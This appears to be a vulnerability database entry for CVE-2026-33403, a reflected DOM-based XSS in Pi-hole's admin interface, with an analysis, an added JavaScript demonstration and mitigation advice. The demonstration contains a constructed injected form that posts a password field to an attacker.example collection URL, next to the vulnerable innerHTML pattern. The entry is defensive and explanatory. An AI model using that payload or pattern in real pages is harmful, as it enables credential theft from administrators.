CVE-2026-33403: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pi-hole web
Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.
AI Analysis
Technical Summary
CVE-2026-33403 is a reflected DOM-based XSS vulnerability in the Pi-hole Admin Interface affecting versions from 6.0 up to, but not including, 6.5. The 'file' query parameter of a crafted URL is read client-side by taillog.js and interpolated into an innerHTML assignment without escaping, so the browser, not the server, renders the attacker-controlled markup. The advisory describes HTML injection rather than script execution, which suggests the existing Content-Security-Policy blocks inline script; what makes the injection exploitable is that the policy has no form-action directive. Unlike most fetch directives, form-action does not fall back to default-src, so a policy that only sets default-src 'self' still lets an injected <form> submit to any origin. An unauthenticated attacker who gets a victim to open the crafted URL can therefore place a credential-harvesting form inside the trusted admin interface and have its contents posted to an external origin. The vulnerability has a CVSS 3.1 base score of 6.1 (medium severity) and is fixed in Pi-hole version 6.5.
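The following is an added example, not code from the Pi-hole project. It reconstructs the pattern the advisory describes (a query parameter concatenated into markup destined for innerHTML) next to an escaped version, and includes a small CSP checker that reports whether form-action is present, since a policy without it does not constrain where an injected form posts. The function names, the markup, the CSP strings and the payload are all constructed for illustration; only the mechanism matches the advisory.

```javascript
// Added example (hypothetical code, not Pi-hole's taillog.js).
// Contrasts unsafe vs. escaped interpolation of an untrusted query parameter
// into HTML, and checks a CSP string for a form-action directive.

// Escape the five characters that matter in an HTML text/attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Reconstruction of the vulnerable pattern: the parameter value is dropped
// straight into markup that the page would assign to element.innerHTML.
function renderHeadingUnsafe(file) {
  return `<h3>Tail of ${file}</h3>`;
}

// Hardened form: identical markup, but the untrusted value is escaped first
// (equivalently, assign the value via textContent instead of innerHTML).
function renderHeadingSafe(file) {
  return `<h3>Tail of ${escapeHtml(file)}</h3>`;
}

// Parse a Content-Security-Policy header into directive -> source list.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    directives.set(tokens[0].toLowerCase(), tokens.slice(1));
  }
  return directives;
}

// form-action has no fallback to default-src: if it is absent, or set to '*',
// an injected <form> may submit to any origin regardless of default-src.
function formActionRestricted(header) {
  const sources = parseCsp(header).get('form-action');
  if (!sources || sources.length === 0) return false;
  return !sources.includes('*');
}

// Pull the action attribute out of every <form> in a markup string, so the
// example runs without a DOM. Escaped markup contains no '<form' and yields [].
function formActions(markup) {
  return [...markup.matchAll(/<form\b[^>]*\baction="([^"]*)"/gi)].map((m) => m[1]);
}

// Constructed payload modelled on the advisory: a form that posts whatever the
// victim types into it to an attacker-controlled origin (example domain).
const PAYLOAD =
  '<form action="https://attacker.example/collect" method="post">' +
  '<input name="password" type="password"></form>';

// Demonstration when run directly with node.
console.log('unsafe :', formActions(renderHeadingUnsafe(PAYLOAD)));
console.log('safe   :', formActions(renderHeadingSafe(PAYLOAD)));
console.log("default-src only restricts forms?",
  formActionRestricted("default-src 'self'; script-src 'self'"));
console.log("with form-action 'self'?",
  formActionRestricted("default-src 'self'; form-action 'self'"));
```

Escaping (or using textContent) removes the injection; adding form-action 'self' removes only the exfiltration path and should be treated as defense in depth, not a substitute for fixing the sink.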
Potential Impact
An unauthenticated attacker who can get an administrator to open a crafted URL can inject arbitrary HTML into the Pi-hole admin interface. The practical outcome described in the advisory is credential theft: an injected form rendered inside the trusted interface collects whatever the victim enters (or a password manager autofills) and submits it to an attacker-controlled origin, because the CSP does not restrict form submission targets. The vulnerability affects confidentiality and integrity but not availability. Exploitation requires user interaction (opening the crafted URL in a browser). There are no known exploits in the wild as of the published date.
Mitigation Recommendations
This vulnerability is fixed in Pi-hole version 6.5; upgrade to 6.5 or later and verify the running web interface version afterwards, since this record carries no patch links or vendor advisory text beyond the description. Confirm the fix against the official Pi-hole release notes or repository. The advisory indicates no additional mitigations. As defense in depth, operators who serve the admin interface through a reverse proxy that sets response headers can add a form-action 'self' directive to the Content-Security-Policy, which closes the exfiltration path the advisory describes but does not remove the HTML injection itself; keeping the admin interface reachable only from trusted networks also narrows who can deliver the crafted URL.
Technical Details
- Data Version: 5.2
- Assigner Short Name: GitHub_M
- Date Reserved: 2026-03-19T17:02:34.170Z
- CVSS Version: 3.1
- State: PUBLISHED
- Remediation Level: not stated (null in the record)
Threat ID: 69d3ce180a160ebd92c09ccb
Added to database: 4/6/2026, 3:15:36 PM
Last enriched: 4/6/2026, 3:31:08 PM
Last updated: 4/7/2026, 7:07:14 AM